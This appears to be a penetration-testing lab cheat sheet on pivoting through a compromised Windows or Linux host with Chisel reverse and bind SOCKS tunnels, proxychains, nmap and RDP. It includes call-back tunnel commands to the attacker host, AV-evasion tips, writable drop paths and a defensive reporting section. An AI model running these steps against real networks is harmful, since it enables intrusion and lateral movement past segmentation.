🛡️ Methodology Checklist
- Download Chisel Linux + Windows binaries to attacker
- Start Chisel server:
./chisel server --reverse - Upload Windows binary to pivot via SMB, HTTP, or NXC
- Pivot connects back:
chisel client [LHOST]:8080 R:socks - Verify SOCKS listener:
netstat -lnpt | grep 1080 - Configure Proxychains:
socks5 127.0.0.1 1080 - Attack internal targets:
proxychains4 -q nxc smb [INTERNAL] ... - Cleanup:
Stop-Process -Name chisel -Forceon pivot, Ctrl+C on attacker
🎯 Operational Context
Use when: Windows pivot host with no SSH — use Chisel reverse SOCKS proxy for tunneling.
Think Dumber First: Attacker: ./chisel server --reverse. Target: chisel client [LHOST]:8080 R:socks. Done — SOCKS5 proxy on attacker port 1080. Route all traffic via proxychains4 -q [TOOL].
Skip when: Linux pivot with SSH available — SSH dynamic proxy is faster to set up and requires no binary transfer.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
go build -ldflags "-s -w" . | Build chisel (same architecture) |
env GOOS=linux GOARCH=amd64 go build -o chisel-x64 -ldflags "-s -w" . | Cross-compile chisel for Linux AMD64 |
scp chisel-x64 [USER]@[PIVOT_IP]:~/chisel | Transfer chisel to pivot host |
./chisel server -v -p [LISTEN_PORT] --socks5 | Bind mode — start server on pivot host (pivot listens) |
./chisel client -v [PIVOT_IP]:[LISTEN_PORT] socks | Bind mode — connect from attack host to pivot server |
sudo ./chisel server --reverse -v -p [LISTEN_PORT] --socks5 | Reverse mode — start server on attack host |
./chisel client -v [LHOST]:[LISTEN_PORT] R:socks | Reverse mode — pivot connects back to attack host |
proxychains nmap -sT -Pn -p 445,139,80 [TARGET_IP] | Scan internal host through Chisel SOCKS tunnel |
proxychains xfreerdp3 /v:[TARGET_IP] /u:[USER] /p:[PASS] /dynamic-resolution +clipboard | RDP to internal host through Chisel tunnel |
🔬 Deep Dive & Workflow
Why Chisel
Chisel tunnels TCP (and optionally UDP) over HTTP with SSH encryption. It works when outbound HTTP is allowed but direct SSH to the pivot is blocked, and handles SOCKS5 (supports both TCP and UDP, unlike SOCKS4).
Building Chisel
Cross-compile to avoid architecture mismatch (Exec format error):
# On attack host (ARM/any)
env GOOS=linux GOARCH=amd64 go build -o chisel-x64 -ldflags "-s -w" . # for Linux AMD64 pivot
go build -o chisel-local . # for local attack host
scp chisel-x64 ubuntu@10.129.202.64:~/chiselMethod 1: Bind Pivot (Victim Listens)
Use when the pivot host has no firewall blocking inbound on the chosen port:
# On pivot host (victim)
./chisel server -v -p 1234 --socks5
# On attack host
./chisel client -v 10.129.202.64:1234 socks
# Opens SOCKS5 listener on local port 1080Method 2: Reverse Pivot (Firewall Bypass)
Use when inbound connections to the pivot are blocked — pivot calls home instead:
# On attack host (start first)
sudo ./chisel server --reverse -v -p 1234 --socks5
# On pivot host
./chisel client -v 10.10.14.18:1234 R:socks
# R:socks = create reverse SOCKS tunnelWhen connected you’ll see: tun: proxy#127.0.0.1:1080=>socks: Listening
Configure proxychains
sudo nano /etc/proxychains4.conf
# Comment out existing socks4 line, add:
socks5 127.0.0.1 1080Using the Tunnel
# RDP (SOCKS5 works for both TCP and UDP unlike SOCKS4)
proxychains xfreerdp3 /v:172.16.5.19 /u:victor /p:pass@123 /dynamic-resolution +clipboard
# Nmap — must use -sT -Pn (SYN and ICMP don't work through SOCKS)
proxychains nmap -sT -Pn -p 445,139,80 172.16.5.19🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Chisel client not connecting | Firewall blocking outbound 8080 | Change server port: chisel server --reverse --port 443; use 443 for better egress |
| AV detecting chisel.exe | Default signature | Rename binary; compile from source with different strings; or use SCP/SFTP to deliver as legitimate filename |
| Proxychains not using Chisel tunnel | Wrong port in proxychains.conf | Chisel default reverse SOCKS port = 1080; update socks5 127.0.0.1 1080 in proxychains.conf |
| Chisel disconnects frequently | Keepalive not set | Add --keepalive 30s to both server and client commands |
| Cannot upload chisel to target | No write permission | Try: %TEMP%, C:\Windows\Tasks\, C:\ProgramData\; use nxc put-file for SMB delivery |
📝 Reporting Trigger
Finding Title: Chisel Reverse SOCKS Proxy Enables Internal Network Pivoting via Windows Host Impact: Chisel proxy through a compromised Windows host provides unrestricted access to internal network resources from an external attacker position, bypassing network segmentation using an encrypted tunnel over HTTP. Root Cause: No monitoring of unusual outbound HTTP connections from Windows workloads. No egress filtering restricting server workloads from establishing outbound HTTPS connections. Recommendation: Implement outbound HTTP/HTTPS proxy with URL categorization for all server workloads. Alert on CONNECT-method proxy usage from non-browser processes. Deploy host-based firewall limiting inter-segment reachability.